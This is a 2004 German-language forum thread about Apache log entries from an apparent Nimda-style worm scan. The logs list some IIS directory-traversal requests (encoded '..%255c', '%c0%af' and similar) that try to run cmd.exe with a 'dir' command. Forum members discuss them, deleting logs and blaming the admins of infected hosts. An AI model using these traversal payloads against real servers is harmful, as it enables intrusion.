Apache Log

Okrill · 24.12.2004

Beim stöbern in den Apache log's bin ich über solche einträge gestolpert (ist eine eigenes Logfile):

217.235.100.236 - - [06/Dec/2004:13:39:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
217.235.100.236 - - [06/Dec/2004:13:39:39 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
217.235.100.236 - - [06/Dec/2004:13:39:42 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:39:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:57 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
217.235.100.236 - - [06/Dec/2004:13:40:00 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:06 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:12 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:15 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:18 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:40:21 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309

und im Access log ist zur passenden zeit das drin:

217.235.100.236 - [06/Dec/2004:13:39:36 +0100] -

So wie ich das interpretiere muss ich mir um unseren OS X Server keine sorgen machen (zumindest noch nicht

) aber ich bin neugierig, war das ein versuch ein Win32 anzugreifen? oder was wurde da versucht?

ColoredScy · 24.12.2004

was für schwachstellen oder lücken da versucht werden auszunutzen kann ich dir nicht sagen, aber ich lösche diese logfiles bei mir monatlich.

die größte logdatei hatte ich im jan. diesen jahres - da war die datei 21mb gross! wobei 99.9% der einträge der von dir beschriebenen art waren.

IceHouse · 24.12.2004

Okrill schrieb:
oder was wurde da versucht?

Das sind unfaehige User/ System Administratoren.

http://www.google.com/search?hl=en&safe=off&q=apache+log+file+"GET+/scripts/..?"&spell=1

und

http://www.apacheweek.com/issues/01-09-21

Gruss von IceHouse

ovski · 11.01.2005

IceHouse schrieb:
Das sind unfaehige User/ System Administratoren.

http://www.google.com/search?hl=en&safe=off&q=apache+log+file+"GET+/scripts/..?"&spell=1

und

http://www.apacheweek.com/issues/01-09-21

Gruss von IceHouse

nun... eigentlich sinds doch würmer welche nen "break in" versuchen? z.B. der nimda... soweit ich weiss hats nichts mit usern oder admins zu tun..

verwechsele ich da was IceHouse?

greez
ovski

IceHouse · 11.01.2005

ovski schrieb:
nun... eigentlich sinds doch würmer welche nen "break in" versuchen? z.B. der nimda... soweit ich weiss hats nichts mit usern oder admins zu tun..

Jede Kette (Apachekonfiguration) ist so stark, wie ihr schwaechstes Glied (Admin/ Mensch).

In diesem Fall erzeugt ein unfaehiger Systemadministrator, durch fahrlaessige Unterlassung, NUR Muell in einem Logfile (mit anderem Schaedling, sowie einem eingeschleustem RootKit haette es aber auch schlimmer kommen koennen). Unter Beruecksichtigung der Tatsache, wann dieser Schaedling das Licht der Welt erblickte und immer noch wuetet, ist es um so schlimmer. Da ist jemand nicht nur faehrlaessig sondern total desinteressiert. So jemandem gehoert jeglicher Zugang zu Computern entzogen.

Gruss von IceHouse

ovski · 11.01.2005

IceHouse schrieb:
Jede Kette (Apachekonfiguration) ist so stark, wie ihr schwaechstes Glied (Admin/ Mensch).

In diesem Fall erzeugt ein unfaehiger Systemadministrator, durch fahrlaessige Unterlassung, NUR Muell in einem Logfile (mit anderem Schaedling, sowie einem eingeschleustem RootKit haette es aber auch schlimmer kommen koennen). Unter Beruecksichtigung der Tatsache, wann dieser Schaedling das Licht der Welt erblickte und immer noch wuetet, ist es um so schlimmer. Da ist jemand nicht nur faehrlaessig sondern total desinteressiert. So jemandem gehoert jeglicher Zugang zu Computern entzogen.

Gruss von IceHouse

find ich jetzt ein wenig weit hergeholt.
egal.. hab leider keine zeit und keine lust zu phylosophieren.

bye

Apache Log

Okrill

Mitglied

ColoredScy

Mitglied

IceHouse

Aktives Mitglied

ovski

Aktives Mitglied

IceHouse

Aktives Mitglied

ovski

Aktives Mitglied